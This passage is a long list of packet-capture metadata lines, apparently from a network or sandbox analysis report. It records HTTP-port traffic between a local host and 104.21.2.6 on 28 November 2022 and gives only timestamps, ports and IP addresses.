                                                                    Nov 28, 2022 16:37:03.777847052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777867079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777883053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777898073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777914047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777916908 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.777937889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777964115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777983904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777998924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778012991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778027058 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778042078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778127909 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.778283119 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.778592110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778752089 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.778851032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778872013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778887987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778903008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778918982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778934956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778949976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778965950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778981924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.778997898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779014111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779030085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779257059 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.779257059 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.779489040 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.779692888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779721022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779736996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779752016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779768944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779783964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779864073 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.779970884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.779993057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.780009031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.780025005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.780040979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.780056953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.780071020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.780148983 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.780320883 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.780320883 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.785259008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785482883 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.785536051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785550117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785573959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785594940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785618067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785640955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785661936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785686016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785707951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785734892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785761118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785792112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.785944939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.785944939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.785995960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786019087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786041975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786063910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786087036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786113024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786118031 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.786118031 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.786149979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786175013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786200047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786220074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786242962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786264896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786282063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.786282063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.786297083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786478043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.786650896 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.786705017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.786921024 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.787004948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787029982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787050962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787067890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787081003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787094116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787106991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787120104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787132025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787144899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787157059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787168980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.787223101 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.787240982 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.787410975 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.811640978 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811820030 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.811901093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811914921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811929941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811942101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811954021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811965942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811976910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.811989069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812000990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812011957 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812024117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812035084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812047005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812114000 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.812309027 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.812309027 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.812344074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812362909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812374115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812386036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812397003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812407970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812417984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812434912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812457085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812478065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812493086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812503099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812647104 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.812695980 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.812906981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812917948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.812933922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813097000 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.813199043 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813211918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813221931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813232899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813235998 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.813250065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813261032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813271999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813282013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813293934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813313961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813328028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.813407898 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.813455105 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.813625097 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.813994884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814007998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814026117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814043999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814063072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814084053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814100027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814111948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814122915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814135075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814146042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814157963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814229965 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.814284086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814305067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814403057 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.814403057 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.814572096 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.814728975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814861059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814874887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814887047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814910889 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.814929008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814941883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814953089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814966917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.814979076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815005064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815018892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815037012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815056086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815074921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815180063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.815180063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.815349102 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.815654039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815752029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815799952 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815825939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815844059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815867901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815896988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815908909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815921068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815932989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815944910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815956116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815968037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.815979004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.816029072 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.816029072 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.816199064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.816368103 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.816576958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.816695929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.816721916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.816771030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.816793919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.816878080 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.817218065 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.823834896 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.828516006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828654051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828674078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828695059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828715086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828732967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828743935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828754902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828766108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828777075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828788042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828799009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828809023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828819990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828830957 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828841925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.828895092 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.828895092 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.828895092 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.828942060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829066038 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.829106092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829128027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829142094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829153061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829164028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829174042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829185963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829196930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829205990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829235077 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.829400063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.829514980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829631090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829716921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829729080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829742908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829755068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829766989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829778910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829797983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829809904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829822063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829824924 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.829839945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829852104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829876900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829889059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.829900980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830188990 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.830188990 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.830415964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830509901 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.830530882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830555916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830568075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830579996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830591917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830604076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830615044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830677032 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.830699921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830718994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830739021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830760002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830780029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830800056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830816031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830827951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.830847025 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.831038952 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.831186056 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.831393003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831484079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831527948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831540108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831557989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831573009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831579924 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.831592083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831604004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831640005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831659079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831679106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831696987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831708908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831721067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831732988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831744909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.831799984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.831799984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.831799984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.832165003 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.832324028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832393885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832439899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832451105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832462072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832473040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832484007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832494974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832504988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832511902 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.832524061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832535028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832545996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832556963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832570076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832581043 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832592010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.832730055 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.832730055 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.832931042 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.833231926 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833398104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833424091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833444118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833456039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.833467007 CET8049830104.21.2.6192.168.11.20
